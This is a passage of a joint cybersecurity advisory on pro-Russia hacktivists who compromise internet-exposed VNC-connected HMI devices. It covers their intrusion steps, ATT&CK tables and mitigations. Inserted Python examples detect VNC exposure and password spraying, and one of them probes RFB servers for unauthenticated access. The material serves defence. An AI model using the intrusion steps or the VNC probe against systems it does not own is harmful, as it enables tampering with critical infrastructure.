Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.

Sector16

Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives. Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

TTP Overview

Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.

Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.

Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems.

Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the Water and Wastewater, Food and Agriculture, and Energy Sectors.

Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:

- Scan for vulnerable devices on the internet [T0883] with open VNC ports [T1595.002].
- Initiate temporary virtual private server (VPS) [T1583.003] to execute password brute force software.
- Use VNC software to access hosts [T1021.005].
- Confirm connection to the vulnerable device [T0886].
- Brute force the password, if required [T1110.003].
- Gain access to HMI devices [T0883], typically with default [T0812], weak, or no passwords [T0859].
- Log the confirmed vulnerable device IP address, port, and password.
- Using the HMI graphical interface [T0823], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [T0828]:
  - Modify usernames/passwords [T0892];
  - Modify parameters [T0836];
  - Modify device name [T0892];
  - Modify instrument settings [T0831];
  - Disable alarms [T0878];
  - Create loss of view (a technique that mandates local hands-on operator intervention) [T0829]; and/or
  - Device restart or shutdown [T0816].
- Disconnect from the device, ending the VNC connection.
- Research the compromised device company after the intrusion [T1591].

Propagation

To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.

Reconnaissance and Initial Access

The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet scanning tools, such as Nmap or OpenVAS, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port 5900 or other nearby ports (5901-5910). Their goal is to gain remote access to HMI devices connected to live control networks.

Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.

Impact

While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.
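The reconnaissance and initial-access pattern described above (scanning for VNC on the default port 5900 and the nearby 5901-5910 range, then repeated password attempts against whatever answers) leaves a recognisable trace in an operator's own perimeter firewall logs. The Python below is an added example written for this advisory; it is not CISA's or any authoring organization's tooling. The log line format, the OT address range 10.50.0.0/16, the constructed sample lines (with RFC 5737 documentation addresses standing in for public sources), and the five-attempts-in-sixty-seconds threshold are all assumptions.

```python
"""Flag internet-exposed VNC endpoints in the OT network and rapid reconnect bursts
that indicate password guessing, from perimeter firewall log lines.
Added example; log format, OT range and thresholds are assumptions."""

import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

VNC_PORTS = range(5900, 5911)                       # 5900 plus the nearby 5901-5910 range the advisory cites
OT_NETWORK = ipaddress.ip_network("10.50.0.0/16")   # assumed OT address space (hypothetical)
BURST_COUNT = 5                                     # reconnects within BURST_WINDOW treated as guessing (assumed)
BURST_WINDOW = timedelta(seconds=60)
PRIVATE_RANGES = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Assumed export format: "<timestamp> <ACCEPT|DROP> TCP <src>:<sport> -> <dst>:<dport>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+TCP\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: one external source hammering a single HMI, one internal
# operator session, one other external source reaching a second HMI.
SAMPLE_LOG = """\
2025-04-02T03:14:01Z ACCEPT TCP 203.0.113.7:51522 -> 10.50.3.21:5900
2025-04-02T03:14:03Z ACCEPT TCP 203.0.113.7:51523 -> 10.50.3.21:5900
2025-04-02T03:14:04Z ACCEPT TCP 203.0.113.7:51524 -> 10.50.3.21:5900
2025-04-02T03:14:06Z ACCEPT TCP 203.0.113.7:51525 -> 10.50.3.21:5900
2025-04-02T03:14:07Z ACCEPT TCP 203.0.113.7:51526 -> 10.50.3.21:5900
2025-04-02T03:20:00Z ACCEPT TCP 10.50.1.10:40000 -> 10.50.3.21:5900
2025-04-02T04:01:11Z ACCEPT TCP 198.51.100.9:6000 -> 10.50.7.2:5901
2025-04-02T04:05:00Z DROP TCP 198.51.100.9:6001 -> 10.50.7.3:5902
2025-04-02T04:06:00Z ACCEPT TCP 198.51.100.9:6002 -> 10.50.7.2:443
"""


def parse_log(text):
    """Turn matching log lines into event dicts; lines in another format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "action": m["action"],
            "src": ipaddress.ip_address(m["src"]),
            "dst": ipaddress.ip_address(m["dst"]),
            "dport": int(m["dport"]),
        })
    return events


def is_internet_source(addr):
    """Anything outside the private/loopback ranges is treated as the public internet."""
    return not any(addr in net for net in PRIVATE_RANGES)


def find_exposed_vnc(events):
    """Accepted VNC connections from the internet into the OT network: the
    minimally secured, internet-facing VNC endpoints the advisory describes."""
    exposed = set()
    for e in events:
        if (e["action"] == "ACCEPT" and e["dport"] in VNC_PORTS
                and e["dst"] in OT_NETWORK and is_internet_source(e["src"])):
            exposed.add((str(e["src"]), str(e["dst"]), e["dport"]))
    return sorted(exposed)


def find_bursts(events):
    """Sources reconnecting to the same VNC endpoint BURST_COUNT times inside
    BURST_WINDOW. A failed VNC password ends the TCP session, so guessing shows
    up as many short connections rather than one long one."""
    by_key = defaultdict(list)
    for e in events:
        if e["dport"] in VNC_PORTS and e["dst"] in OT_NETWORK:
            by_key[(str(e["src"]), str(e["dst"]), e["dport"])].append(e["ts"])
    bursts = []
    for key, stamps in by_key.items():
        stamps.sort()
        for i in range(len(stamps) - BURST_COUNT + 1):
            if stamps[i + BURST_COUNT - 1] - stamps[i] <= BURST_WINDOW:
                bursts.append(key)
                break
    return sorted(bursts)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("Internet-exposed VNC endpoints (src, dst, port):", find_exposed_vnc(evts))
    print("Password-guessing bursts (src, dst, port):", find_bursts(evts))
```

Run as a script it reports both findings for the constructed sample; in practice the input is the exported perimeter log, and the exposed-endpoint list is worth reconciling against the attack surface scan of owned IP ranges that the Mitigations section recommends, since a VNC service reachable from the internet is the precondition for every step in the TTP list.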
Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation. MITRE ATT&CK Tactics and Techniques See Table 1 to Table 10 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 1. Reconnaissance Technique Title ID Use Gather Victim Organization Information T1591 Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims. Active Scanning: Vulnerability Scanning T1595.002 Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports. Table 2. Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 Threat actors use virtual infrastructure to obfuscate identifiers. Table 3. Initial Access Technique Title ID Use Internet Accessible Device T0883 Threat actors gain access through less secure HMI devices exposed to the internet. Table 4. Persistence Technique Title ID Use Valid Accounts T0859 Threat actors use password guessing tools to access legitimate accounts on the HMI devices. Table 5. Credential Access Technique Title ID Use Brute Force: Password Spraying T1110.003 Threat actors use tools to rapidly guess common or simple passwords. Table 6. 
Lateral Movement Technique Title ID Use Default Credentials T0812 Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts. Remote Services T0886 Threat actors leverage VNC services to access system HMI devices. Remote Services: VNC T1021.005 Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software. Table 7. Execution Technique Title ID Use Graphical User Interface T0823 Threat actors interact with HMI devices via GUIs, attempting to modify control devices. Table 8. Inhibit Response Function Technique Title ID Use Device Restart/Shutdown T0816 While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response. Alarm Suppression T0878 Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion. Change Credential T0892 Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations. Table 9. Impair Process Control Technique Title ID Use Modify Parameter T0836 Threat actors attempt to change upper and lower limits of operational devices as available from the HMI. Unauthorized Command Message T0855 Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact. Table 10. Impact Technique Title ID Use Loss of Productivity and Revenue T0828 Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities. Loss of View T0829 Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely. 
Manipulation of Control | T0831 | Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes.

Incident Response

If organizations find exposed systems with weak or default passwords, they should assume threat actors have compromised the system and begin the following incident response protocols:

1. Determine which hosts were compromised and isolate them by quarantining or taking them offline.
2. Initiate threat hunting activities to scope the intrusion.
3. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
4. Reimage compromised hosts.
5. Provision new account credentials.
6. Report the compromise to CISA, FBI, and/or NSA. See the Contact Information section of this advisory.
7. Harden the network to prevent additional malicious activity. See the Mitigations section of this advisory for guidance.

Mitigations

OT Asset Owners and Operators

The authoring organizations recommend that organizations implement the mitigations below to improve their cybersecurity posture based on the threat actors' activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

Reduce exposure of OT assets to the public-facing internet. When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [CPG 3.S].
Asset owners should use attack surface management services and web-based search platforms to scan the internet. This mitigation can help identify whether VNC systems are exposed within the IP ranges they own, especially for connections set up by third parties. Note: For more information on attack surface management, see CISA's Internet Exposure Reduction Guidance, CISA's Cyber Hygiene Services for U.S. critical infrastructure, and NSA's Attack Surface Management for the U.S. Defense Industrial Base.

Implement network segmentation between IT and OT networks. Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [CPG 3.I]. If exposure to the internet is necessary, place a firewall and/or virtual private network in front of the devices to control access to them. Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.

Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic; asset owners should explicitly permit authorized destinations and protocols based on operational requirements. Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks. Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.

Adopt mature asset management processes, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [CPG 2.A].
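The following is an added example, not code from the advisory or its authoring organizations, of the exposure check described above, run against IP ranges you own rather than the whole internet. It completes only the RFB version and security-type handshake, reports the VNC protocol version and whether the listener offers the "None" security type (no authentication at all), and never opens a session. The in-process fake server, the short security-type name table and all addresses are constructed for offline use.

```python
"""Probe listeners for an exposed RFB (VNC) service and report whether they
accept unauthenticated sessions. Added example for sweeping IP ranges you
own; not code from the advisory. Only the version/security-type handshake
is performed, so the probe never opens a desktop session."""
import socket
import struct
import threading
from typing import Dict, List, Tuple

# Well-known security type numbers from the RFB specification (assumption:
# this short list is enough to triage a sweep; unknown values are reported).
SECURITY_TYPE_NAMES = {0: "connection failed", 1: "None", 2: "VNC Authentication",
                       16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during RFB handshake")
        buf += chunk
    return buf


def probe_vnc(host: str, port: int = 5900, timeout: float = 3.0) -> Dict:
    """Return the RFB version and offered security types of host:port.
    'no_auth' is True when the server offers type 1 (None)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = _recv_exact(sock, 12)                 # e.g. b"RFB 003.008\n"
        if not (banner.startswith(b"RFB ") and banner.endswith(b"\n")):
            return {"rfb": False, "banner": banner}
        version = banner[4:11].decode("ascii")
        major, minor = (int(x) for x in version.split("."))
        sock.sendall(banner)                           # agree to the server's version
        if (major, minor) >= (3, 7):                   # RFB 3.7+: count byte, then types
            count = _recv_exact(sock, 1)[0]
            if count:
                types, reason = list(_recv_exact(sock, count)), ""
            else:                                      # server refuses; a reason string follows
                length = struct.unpack(">I", _recv_exact(sock, 4))[0]
                types, reason = [], _recv_exact(sock, length).decode("latin-1", "replace")
        else:                                          # RFB 3.3: one big-endian uint32 type
            types, reason = [struct.unpack(">I", _recv_exact(sock, 4))[0]], ""
    return {"rfb": True, "version": version, "security_types": types,
            "names": [SECURITY_TYPE_NAMES.get(t, f"unknown({t})") for t in types],
            "no_auth": 1 in types, "refused": reason}


def sweep(targets: List[Tuple[str, int]]) -> List[Tuple[str, int, Dict]]:
    """Probe each (host, port); unreachable targets are recorded, not raised."""
    results = []
    for host, port in targets:
        try:
            results.append((host, port, probe_vnc(host, port)))
        except OSError as exc:
            results.append((host, port, {"rfb": False, "error": str(exc)}))
    return results


def start_fake_vnc(security_types: List[int], version: bytes = b"RFB 003.008\n") -> int:
    """Constructed stand-in for a VNC server so the probe can run offline.
    Answers one connection on 127.0.0.1 and returns the listening port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(version)
            _recv_exact(conn, 12)                      # client's version reply
            if version >= b"RFB 003.007\n":
                if security_types:
                    conn.sendall(bytes([len(security_types)] + security_types))
                else:                                  # refusal with a reason string
                    reason = b"Too many authentication failures"
                    conn.sendall(b"\x00" + struct.pack(">I", len(reason)) + reason)
            else:
                conn.sendall(struct.pack(">I", security_types[0]))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    targets = [("127.0.0.1", start_fake_vnc([1])),      # offers "None": exposed, no auth
               ("127.0.0.1", start_fake_vnc([2, 19])),  # VNC Authentication / VeNCrypt
               ("127.0.0.1", 1)]                        # nothing listening
    for host, port, result in sweep(targets):
        verdict = "EXPOSED WITHOUT AUTHENTICATION" if result.get("no_auth") else "review"
        print(f"{host}:{port} -> {verdict} {result}")
```

A listener that offers security type 1 is reachable without any password and is the situation Tables 3 to 6 describe. One that offers only VNC Authentication still needs the allowlist and firewall controls that follow, because the VNC challenge-response password is exactly what the password spraying in Table 5 targets. A refusal with a reason string is what many servers return after repeated failed logins, so it can itself be a sign that someone else has already been guessing.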
Keep remote access services updated with the latest available version and ensure all systems and software are up to date with patches and necessary security updates. Keep VNC systems updated with the latest available version. Refer to the joint Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators for help in reducing cybersecurity risk by identifying which assets within the environment should be secured and protected.

Ensure OT assets use robust authentication procedures. Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets for threat actors using credential theft techniques. Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as on the network devices protecting those services. This is especially important for services that require internet accessibility [CPG 3.A] [CPG 3.B] [CPG 3.C] [CPG 3.F].

Establish an allowlist that permits only authorized device IP addresses and/or media access control (MAC) addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts that do not meet these criteria [CPG 3.E].

Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords.

Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [CPG 3.R].

Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, program, or filesystems.

Enable control system security features that can separate and audit view and control functions.
Limiting remotely accessible or default user accounts to "view-only" removes the potential for impact without exploiting a vulnerability [CPG 3.G].

Implement and practice business recovery/disaster recovery plans. Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation. Include scenarios that necessitate switching to manual operations. Maintaining an organization's capability to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [CPG 6.A].

Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [CPG 3.O].

Collect and monitor the traffic of OT assets and networking devices. This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset's operating mode or modify programs. Review configurations for setpoint ranges or tag values to ensure they stay within safe ranges, and establish alerting for deviations.

Take a proactive approach in the procurement process by following the guidance outlined in the joint guide Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products.

OT Device Manufacturers

Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software.

Eliminate default credentials and require strong passwords.
The use of default credentials is a top weakness threat actors exploit to gain access to systems.

Mandate MFA for privileged users. Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety-critical components at no additional cost.

Practice secure by default principles. OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.

Include logging at no additional charge. Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available at no cost and use open standard logging formats.

Publish Software Bills of Materials (SBOMs). Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA's SBOM webpage for more information.

Additionally, see CISA's Secure by Design Alert on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure "out of the box" without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA's Secure by Design webpage.
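As an added example that is not part of the advisory, the following Python ties together three of the owner/operator mitigations above at the HMI/VNC layer: the IP allowlist refined to operator working hours, with alerting on attempts outside it [CPG 3.E]; detection of the password spraying in Table 5; and alerting when tag values leave their engineered safe ranges or when the limits themselves are changed from the HMI (Modify Parameter, T0836). The allowlist, working hours, safe ranges, thresholds and every event are constructed.

```python
"""Added example (not from the advisory): alerting on HMI/VNC logins that
fall outside an IP allowlist or operator working hours, on password
spraying against the HMI, and on tag values or setpoint limits leaving
their engineered safe ranges. All policy values and events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

# Policy (assumed for the example): operator workstations plus a vendor VPN
# pool may reach the HMI, and only 06:00-18:00 Monday to Friday.
ALLOWLIST = [ip_network("10.20.1.0/24"), ip_network("10.99.0.0/16")]
WORK_START, WORK_END = 6, 18
# Engineered safe ranges for setpoints (assumed), used to judge both live
# values and any change to the limits themselves (ATT&CK for ICS T0836).
SAFE_RANGES: Dict[str, Tuple[float, float]] = {
    "TANK1_LEVEL_SP": (30.0, 70.0),     # percent
    "PUMP2_SPEED_SP": (0.0, 1450.0),    # rpm
}
SPRAY_WINDOW, SPRAY_FAILS, SPRAY_USERS = timedelta(minutes=5), 5, 3


def in_allowlist(src: str) -> bool:
    addr = ip_address(src)
    return any(addr in net for net in ALLOWLIST)


def in_working_hours(ts: datetime) -> bool:
    return ts.weekday() < 5 and WORK_START <= ts.hour < WORK_END


def check_access(events: List[dict]) -> List[str]:
    """events: time-ordered HMI/VNC logins {'ts','src','user','result'}."""
    alerts: List[str] = []
    fails = defaultdict(list)                           # src -> [(ts, user)]
    for e in events:
        when = f"{e['ts']:%Y-%m-%d %H:%M}"
        if not in_allowlist(e["src"]):
            alerts.append(f"{when} {e['src']} not in allowlist (user={e['user']}, {e['result']})")
        elif not in_working_hours(e["ts"]):
            alerts.append(f"{when} {e['src']} login outside working hours (user={e['user']})")
        if e["result"] == "fail":                       # T1110.003 password spraying
            recent = [(t, u) for t, u in fails[e["src"]] if e["ts"] - t <= SPRAY_WINDOW]
            recent.append((e["ts"], e["user"]))
            users = {u for _, u in recent}
            if len(recent) >= SPRAY_FAILS and len(users) >= SPRAY_USERS:
                alerts.append(f"{when} {e['src']} password spraying: "
                              f"{len(recent)} failures across {len(users)} users")
                recent = []                             # one alert per burst
            fails[e["src"]] = recent
    return alerts


def check_process(samples: List[dict]) -> List[str]:
    """samples: {'ts','tag','value'} readings or {'ts','tag','limits','by'} limit changes."""
    alerts: List[str] = []
    for s in samples:
        lo, hi = SAFE_RANGES[s["tag"]]
        when = f"{s['ts']:%Y-%m-%d %H:%M}"
        if "limits" in s:                               # limits edited from the HMI
            alerts.append(f"{when} {s['tag']} limits changed to {s['limits']} by {s['by']} "
                          f"(engineered range {lo}-{hi}); verify with operations")
        elif not lo <= s["value"] <= hi:
            alerts.append(f"{when} {s['tag']}={s['value']} outside safe range {lo}-{hi}")
    return alerts


# Constructed sample data: a Tuesday with an off-hours operator login, a spray
# from an internet address that eventually succeeds, then a widened limit
# followed by a setpoint the original range would have rejected.
DAY = datetime(2025, 12, 9)
SAMPLE_ACCESS = [
    {"ts": DAY.replace(hour=2, minute=14), "src": "10.20.1.15", "user": "operator1", "result": "ok"},
    *({"ts": DAY.replace(hour=3, minute=m), "src": "203.0.113.44", "user": u, "result": "fail"}
      for m, u in enumerate(["admin", "root", "operator", "user", "guest"])),
    {"ts": DAY.replace(hour=3, minute=7), "src": "203.0.113.44", "user": "admin", "result": "ok"},
    {"ts": DAY.replace(hour=9, minute=5), "src": "10.20.1.15", "user": "operator1", "result": "ok"},
]
SAMPLE_PROCESS = [
    {"ts": DAY.replace(hour=3, minute=10), "tag": "TANK1_LEVEL_SP", "limits": (0.0, 100.0), "by": "admin"},
    {"ts": DAY.replace(hour=3, minute=12), "tag": "TANK1_LEVEL_SP", "value": 95.0},
    {"ts": DAY.replace(hour=9, minute=30), "tag": "PUMP2_SPEED_SP", "value": 1200.0},
]

if __name__ == "__main__":
    for line in check_access(SAMPLE_ACCESS) + check_process(SAMPLE_PROCESS):
        print(line)
```

Every login from an address outside the allowlist raises its own alert, so a spray shows up as a burst of allowlist alerts before the spraying rule fires; that is deliberate, because the first few attempts are the point at which a perimeter block is still cheap. The limit-change rule never judges the new values against the old range, it only demands that operations confirm the change, since a legitimate re-engineering of a setpoint and a Modify Parameter attack look identical in the data.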
Validate Security Controls

In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&CK techniques described in this advisory. To start:

1. Select an ATT&CK technique described in this advisory (see Table 1 to Table 10).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies' performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:

- CISA, EPA, NSA, FBI, ASD's ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ's Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected.
- CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK's guidance on Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity can help organizations protect OT systems from pro-Russia hacktivist activity.
- NSA and CISA's guidance on Control System Defense: Know the Opponent helps organizations defend OT and ICS assets against malicious cyber activity.
- CISA and EPA's resource page on Water and Wastewater Cybersecurity helps organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems. For additional guidance, see CISA, EPA, and FBI's fact sheet on Top Cyber Actions for Securing Water Systems.
- The Food and Ag-ISAC's best practices in Food and Ag Cybersecurity: A Guide for Small & Medium Enterprises provide recommendations to help mitigate cyber threats.
- DOE and the National Association of Regulatory Utility Commissioners' Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy Resources (DER) webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators, to help mitigate cybersecurity risks.

Additional resources that apply to this advisory include:

- EPA's Cybersecurity for the Water Sector resource page provides organizations with guidance on implementing basic cyber hygiene practices.
- CISA's Cross-Sector Cybersecurity Performance Goals enable critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques.
- CISA's Require Strong Passwords webpage supports small and medium-sized businesses in mitigating malicious cyber activity that targets weak passwords.
- CISA, NSA, FBI, EPA, TSA, and international partners' guidance Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products.
- DOE's guidance on Cyber-Informed Engineering recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems.
- CISA's Cyber Hygiene Services help critical infrastructure organizations reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors.
- CISA, NSA, FBI, and international partners' guidance on Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software urges software manufacturers to provide customers with products that are safer and more secure. See more information in these Secure by Design Alerts: How Manufacturers Can Protect Customers by Eliminating Default Passwords and How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity.

Contact Information

U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:

- Contact CISA via CISA's 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
- For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.
- Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
- Canadian organizations: Report incidents by emailing Cyber Centre at contact@cyber.gc.ca.
